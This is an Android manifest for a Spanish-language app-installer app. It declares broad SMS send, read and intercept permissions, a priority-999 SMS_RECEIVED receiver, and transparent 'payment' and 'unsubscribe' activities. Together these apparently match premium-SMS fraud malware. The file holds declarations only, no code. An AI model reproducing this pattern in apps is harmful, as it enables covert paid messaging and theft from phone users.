<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.espabit.esinstallappES">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.WRITE_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.RESTART_PACKAGES"/>
    <uses-permission android:name="com.google.android.c2dm.permission.RECEIVE"/>
    <uses-permission android:name="android.permission.GET_PACKAGE_SIZE"/>
    <uses-permission android:name="android.permission.GET_ACCOUNTS"/>
    <uses-permission android:name="android.permission.VIBRATE"/>
    <permission android:name="com.espabit.esinstallappES.permission.C2D_MESSAGE" android:protectionLevel="signature"/>
    <uses-permission android:name="com.espabit.esinstallappES.permission.C2D_MESSAGE"/>
    <application android:allowBackup="true" android:icon="@drawable/icono" android:label="@string/app_name" android:theme="@style/AppTheme">
        <activity android:label="@string/app_name" android:name="com.espabit.esinstallappES.actividades.PantallaCarga">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:name="com.espabit.esinstallappES.actividades.Home"/>
        <activity android:name="com.espabit.esinstallappES.actividades.Actualizar"/>
        <activity android:name="com.espabit.esinstallappES.actividades.Descargadas"/>
        <activity android:name="com.espabit.esinstallappES.actividades.AplicacionesActivity"/>
        <activity android:name="com.espabit.esinstallappES.actividades.Categorias"/>
        <activity android:name="com.espabit.esinstallappES.actividades.DetallesAplicacion"/>
        <activity android:name="com.espabit.esinstallappES.actividades.VerImagen"/>
        <activity android:name="com.espabit.esinstallappES.actividades.GoPromo"/>
        <activity android:label="@string/app_name" android:name="com.espabit.esinstallappES.actividades.DivPago3" android:theme="@style/Theme.Transparent2"/>
        <activity android:label="@string/app_name" android:name="com.espabit.esinstallappES.actividades.Baja1" android:theme="@style/Theme.Transparent"/>
        <activity android:label="@string/app_name" android:name="com.espabit.esinstallappES.actividades.Baja2" android:theme="@style/Theme.Transparent"/>
        <activity android:label="@string/app_name" android:name="com.espabit.esinstallappES.actividades.Baja3" android:theme="@style/Theme.Transparent"/>
        <receiver android:enabled="true" android:name="com.google.android.gcm.GCMBroadcastReceiver" android:permission="com.google.android.c2dm.permission.SEND">
            <intent-filter>
                <action android:name="com.google.android.c2dm.intent.RECEIVE"/>
                <action android:name="com.google.android.c2dm.intent.REGISTRATION"/>
                <category android:name="com.espabit.esinstallappES"/>
            </intent-filter>
        </receiver>
        <service android:name=".GCMIntentService"/>
        <receiver android:exported="true" android:name=".MandadorMensajes$MessageReceiver">
            <intent-filter android:priority="999">
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
            </intent-filter>
        </receiver>
    </application>
</manifest>
